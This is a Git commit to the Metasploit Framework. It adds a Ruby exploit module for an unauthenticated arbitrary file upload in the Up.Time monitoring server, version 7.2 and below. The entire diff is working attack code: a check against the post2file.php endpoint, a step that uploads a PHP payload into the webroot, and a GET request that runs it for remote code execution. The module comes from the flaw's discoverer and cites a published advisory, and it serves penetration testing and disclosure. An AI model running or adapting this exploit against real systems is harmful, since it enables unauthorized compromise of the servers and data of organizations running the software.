Land rapid7#2723, @denandz's module for OSVDB-100423

jvazquez-r7 · jvazquez-r7 · commit f77784cd0d55 · 2013-12-06T17:32:07.000-06:00
diff --git a/modules/exploits/multi/http/uptime_file_upload.rb b/modules/exploits/multi/http/uptime_file_upload.rb
@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload',
+      'Description'    => %q{
+          This module exploits an arbitrary file upload vulnerability found within the Up.Time
+          monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
+          webroot without authentication, leading to arbitrary code execution.
+      },
+      'Author'         =>
+        [
+          'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'OSVDB', '100423' ],
+          [ 'BID', '64031'],
+          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
+        ],
+      'Payload'            =>
+        {
+          'Space' => 10000, # just a big enough number to fit any PHP payload
+          'DisableNops' => true
+        },
+      'Platform'       => 'php',
+      'Arch'         => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Up.Time 7.2', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 19 2013'))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
+      Opt::RPORT(9999)
+    ], self.class)
+  end
+
+  def check
+    uri =  target_uri.path
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
+    })
+
+    if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Unknown
+
+  end
+
+  def exploit
+    print_status("#{peer} - Uploading PHP to Up.Time server")
+    uri =  target_uri.path
+
+    @payload_name = "#{rand_text_alpha(5)}.php"
+    php_payload = get_write_exec_payload(:unlink_self => true)
+
+    post_data = ({
+      "file_name" => @payload_name,
+      "script" => php_payload
+    })
+
+    print_status("#{peer} - Uploading payload #{@payload_name}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, 'wizards', 'post2file.php'),
+      'vars_post'   => post_data,
+    })
+
+    unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
+      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
+
+    print_status("#{peer} - Executing payload #{@payload_name}")
+    res = send_request_cgi({
+      'uri'    => normalize_uri(uri, 'wizards', @payload_name),
+      'method' => 'GET'
+    })
+  end
+end
